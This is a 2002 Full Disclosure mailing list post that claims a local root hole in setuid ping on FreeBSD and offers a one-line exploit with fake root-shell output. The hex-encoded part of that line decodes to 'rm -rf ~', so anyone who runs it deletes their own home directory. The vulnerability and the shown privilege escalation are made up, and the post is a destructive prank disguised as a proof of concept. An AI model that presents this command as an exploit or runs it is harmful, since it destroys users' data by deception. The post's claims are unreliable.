Full Disclosure mailing list archives
ATTENTION Local Root ATTENTION
From: drdre () hush com (drdre () hush com)
Date: Sun, 15 Sep 2002 06:28:08 -0700
DrDre-Labs recently discovered a rather dangerous bug in the "ping" program which is installed setuid-root on most unix and unixlike systems. This bug is not remotly exploitable. Tested on FreeBSD 4.6 bash# id uid=1337(drdre) gid=1006(researchers) groups=1006(researchers) 1008(lab-staff) bash# ping `perl -e 'print "\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"` server error ^ ^ $ id uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) Vendors are already informed. Greets: Captain Crunch, Peter Pan, Charly Root Regards -- DrDre security research group Get your free encrypted email at https://www.hushmail.com
Current thread:
- ATTENTION Local Root ATTENTION drdre () hush com (Sep 15)
- ATTENTION Local Root ATTENTION Roman Drahtmueller (Sep 15)